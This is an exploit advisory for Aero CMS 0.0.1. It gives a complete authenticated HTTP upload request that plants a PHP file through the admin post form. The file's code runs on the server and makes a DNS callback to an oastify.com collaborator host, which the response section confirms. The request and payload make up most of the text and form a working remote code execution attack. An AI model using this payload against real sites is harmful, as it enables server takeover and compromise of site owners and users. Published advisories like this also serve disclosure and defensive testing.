Headline
Aero CMS 0.0.1 Remote Shell Upload
Aero CMS version 0.l0.1 remote shell upload exploit. Original discovery of this issue in this version is attributed to D4rkP0w4r in April of 2022.
Exploit Title: Aero CMS v0.0.1 - PHP Code Injection (auth)
Date: 15/10/2022
Exploit Author: Hubert Wojciechowski
Contact Author: [email protected]
Vendor Homepage: https://github.com/MegaTKC/AeroCMS
Software Link: https://github.com/MegaTKC/AeroCMS
Version: 0.0.1
Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
Example
Param: image content uploading image
Req
POST /AeroCMS-master/admin/posts.php?source=add_post HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------369779619541997471051134453116
Content-Length: 1156
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/AeroCMS-master/admin/posts.php?source=add_post
Cookie: phpwcmsBELang=en; homeMaxCntParts=10; homeCntType=24; PHPSESSID=k3a5d2usjb00cd7hpoii0qgj75
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_title"
mmmmmmmmmmmmmmmmm
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_category_id"
1
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_user"
admin
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_status"
draft
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="image"; filename="at8vapghhb.php"
Content-Type: text/plain
<?php printf(“bh3gr8e32s".(7*6)."ci4hs9f43t”);gethostbyname(“48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oasti"."fy.com”);?>
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_tags"
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="post_content"
<p>mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm</p>
-----------------------------369779619541997471051134453116
Content-Disposition: form-data; name="create_post"
Publish Post
-----------------------------369779619541997471051134453116–
Res:
The Collaborator server received a DNS lookup of type A for the domain name 48at8vapghhbnm0uo4sx5ox8izoxcu0mzarxmlb.oastify.com.